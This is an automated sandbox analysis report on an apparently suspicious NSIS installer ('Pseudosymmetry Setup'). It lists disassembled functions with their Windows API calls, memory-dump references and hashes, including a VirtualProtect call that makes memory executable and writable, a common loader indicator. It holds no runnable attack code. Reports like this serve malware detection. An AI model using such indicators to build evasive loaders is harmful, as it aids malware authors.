Opcode Fuzzy Hash: d5b49ddab0cd4e2ea66004b9ca03d90090f65eaedbc84a66a30e005ee5890498
Instruction Fuzzy Hash: 7411C131905205EFDB11DF60CA889BFBBB4EF10344F20847FE442B62C0D2B85A41DB6A

Function 0040570F Relevance: 3.0, APIs: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E

Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,?,?,764D3410,00405471,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 004056C8
Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1

lstrlenA.KERNEL32(0042AC28,00000000,0042AC28,0042AC28,?,?,764D3410,00405471,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 00405762
GetFileAttributesA.KERNELBASE(0042AC28,0042AC28,0042AC28,0042AC28,0042AC28,0042AC28,00000000,0042AC28,0042AC28,?,?,764D3410,00405471,?,C:\Users\user\AppData\Local\Temp\,764D3410), ref: 00405772

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 8b03ff19f54fddd6cded50317c21ce54d7c2962048407970c9729a0c1cf0d5b4
Instruction ID: 8ff176f5aaeb0f14354d6cc41ea137eaa18f9097bb8f7bd8f48f6d70b4538586
Opcode Fuzzy Hash: 8b03ff19f54fddd6cded50317c21ce54d7c2962048407970c9729a0c1cf0d5b4
Instruction Fuzzy Hash: 45F0A435109E51A6C623323A2C49AAF1A55CE96364F58053BF854B32D2CB3C8943ED6E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bdb71405e2a0c5aec897d6259c77254c040c55820e55e0b8689271529569ecd8
Instruction ID: fab204b64a6227e7b492ca485547aa1deaf69a3a7d967e88ae29f10f86ebb869
Opcode Fuzzy Hash: bdb71405e2a0c5aec897d6259c77254c040c55820e55e0b8689271529569ecd8
Instruction Fuzzy Hash: 6F012831B242109BE7294B789C04B6A3698E710725F11863BF811F72F1D678DC029B4D

Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
RegCloseKey.ADVAPI32(00000000), ref: 004022E8

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: f4ed400c453e05d82e90165a1a54b60dfa2770a8940896abf0f60c7a8af17ab2
Instruction ID: 53bfa723240d4389843108291fedb1583fd989766778df965787cce0e335e245
Opcode Fuzzy Hash: f4ed400c453e05d82e90165a1a54b60dfa2770a8940896abf0f60c7a8af17ab2
Instruction Fuzzy Hash: E1F04F72A04111ABDB51BBB49A8EAAE6268AB00318F14453BF501B71C1DAF85E01A67E

Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
EnableWindow.USER32(00000000,00000000), ref: 00401DCD

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 7a08b6d27524c8f2bcd59da278bf895b6231aaf852311aef13317f2d9cf00f04
Instruction ID: c39a0513cc250adc57ff8c1e2cc51b7a242abbfcd93ee858ef65dfb317296277
Opcode Fuzzy Hash: 7a08b6d27524c8f2bcd59da278bf895b6231aaf852311aef13317f2d9cf00f04
Instruction Fuzzy Hash: 06E0CD72B04110DBD710B7B45D4A55E3364DF10359B104437F501F11C1D6B85C40466D

Function 00405822 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,?), ref: 00405826
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16

Function 00402519 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 1b95fb6c5de9dceb638ab3b51104b016d9e3be4dca251902a50dd6d9bc821a7d
Instruction ID: d6d0aa84f8b0bb501b14b1d69fea20307f251e2ebcbe8d2f2d3121e022689ca8
Opcode Fuzzy Hash: 1b95fb6c5de9dceb638ab3b51104b016d9e3be4dca251902a50dd6d9bc821a7d
Instruction Fuzzy Hash: C5212B70D04299BECF229F648E581EEBBB09B05304F64407BE491B63C5D1BC9A81C72D

Function 004025D3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED

Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 6eab7794b4dfe1c36aa75abedecda1bfdf01b9c3e21da1313a7bc0f9937e8967
Instruction ID: 5c6e64fcefe0017d27201ba2f5e1bf0226efa958ba722e95579819ed560bd135
Opcode Fuzzy Hash: 6eab7794b4dfe1c36aa75abedecda1bfdf01b9c3e21da1313a7bc0f9937e8967
Instruction Fuzzy Hash: B9E04F76A00120BBDB01B7A59E4ADBF7768DB20319B14853BF501F10C1C7BC5C019A2E

Function 00401705 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: e8e22b26d33e44c886833d6e8cbc9c406648bd236ad7edf85d0003c3f20bef22
Instruction ID: b18b8bb612da985d69bbdbf5a514d2b4b729ad2f1d78be7b7ec956b08fa5ed90
Opcode Fuzzy Hash: e8e22b26d33e44c886833d6e8cbc9c406648bd236ad7edf85d0003c3f20bef22
Instruction Fuzzy Hash: 4EE026B2304100BBE340DB64DD48EAB7798EB10368F30863BE511E60C1E3B99902D33D

Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 81d0b8bea01c40766a4e26c31b0fd2783b071aace83e065fc2e64bbefc8daaeb
Instruction ID: e075994b4b6ec2cfc8745d1ad65b115f53658dabe6a3d6a661942630d7023fc8
Opcode Fuzzy Hash: 81d0b8bea01c40766a4e26c31b0fd2783b071aace83e065fc2e64bbefc8daaeb
Instruction Fuzzy Hash: 75E08676250108BFD740EFA5DD47F9537ECF714704F008025B608D7091CA74F5109B68

Function 0040589A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403094,00000000,00000000,00402EB2,000000FF,00000004,00000000,00000000,00000000), ref: 004058AE

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 6bc6e998f3f9f12d3e19600f04b58372c044213204429a002bc0a6642a8b1746
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 8AE0B63262465AABDF10AE669C00AAB7B6CFF05361F048432BD55E6190D231E8259AA5

Function 10002724 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002742

Memory Dump Source

Source File: 00000001.00000002.13297986695.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.13297947944.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298021849.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298062331.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_temp_executable.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 652332ac7bde672dc05c446cd50b76b12c9e61f3b08479d0be882dc895827dde
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: A3F09BF19092A0DEF360DF688CC47063FE4E3983D6B03852AE358F6269EB3441448B19

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 028b23817edcb9d5a681a2f1b90fbfdc039da7fad4989d98a1c85684b1a6955b
Instruction ID: 7c1a0f30f71e3147f423eec4698c378af2d763e0b4495e0f7a0db1e5312df1a1
Opcode Fuzzy Hash: 028b23817edcb9d5a681a2f1b90fbfdc039da7fad4989d98a1c85684b1a6955b
Instruction Fuzzy Hash: 63D01277B08114D7DB00EBB5AE48A9E7364FB14324F208637D111F21D0D7B98551A629

Function 00403097 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF0,?), ref: 004030A5

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E5

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: aea1a711f5e69b3d6e24361e3102ff77a16b4b63784a5998fc523d22ac42562a
Instruction ID: 7b7c5fc7cfdde63129b4467962d9d0565776b1c6548a4dcd8857098e901fc055
Opcode Fuzzy Hash: aea1a711f5e69b3d6e24361e3102ff77a16b4b63784a5998fc523d22ac42562a
Instruction Fuzzy Hash: E2D0C977B14100ABD750E7B9AE8949E73A8FB5136A7248833D902E2192E679D842862D

Non-executed Functions

Function 004047F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404811
GetDlgItem.USER32(?,00000408), ref: 0040481C
GlobalAlloc.KERNEL32(00000040,?), ref: 00404866
LoadBitmapA.USER32(0000006E), ref: 00404879
SetWindowLongA.USER32(?,000000FC,00404DF0), ref: 00404892
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048A6
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048B8
SendMessageA.USER32(?,00001109,00000002), ref: 004048CE
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048DA
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048EC
DeleteObject.GDI32(00000000), ref: 004048EF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040491A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404926
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049BB
SendMessageA.USER32(?,0000110A,?,00000000), ref: 004049E6
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049FA
GetWindowLongA.USER32(?,000000F0), ref: 00404A29
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A37
ShowWindow.USER32(?,00000005), ref: 00404A48
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B45
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BAA
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BBF
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BE3
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C03
ImageList_Destroy.COMCTL32(?), ref: 00404C18
GlobalFree.KERNEL32(?), ref: 00404C28
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA1
SendMessageA.USER32(?,00001102,?,?), ref: 00404D4A
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D59
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D79
ShowWindow.USER32(?,00000000), ref: 00404DC7
GetDlgItem.USER32(?,000003FE), ref: 00404DD2
ShowWindow.USER32(00000000), ref: 00404DD9

Strings

M, xrefs: 004049A2
N, xrefs: 00404A83
, xrefs: 00404DB1

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

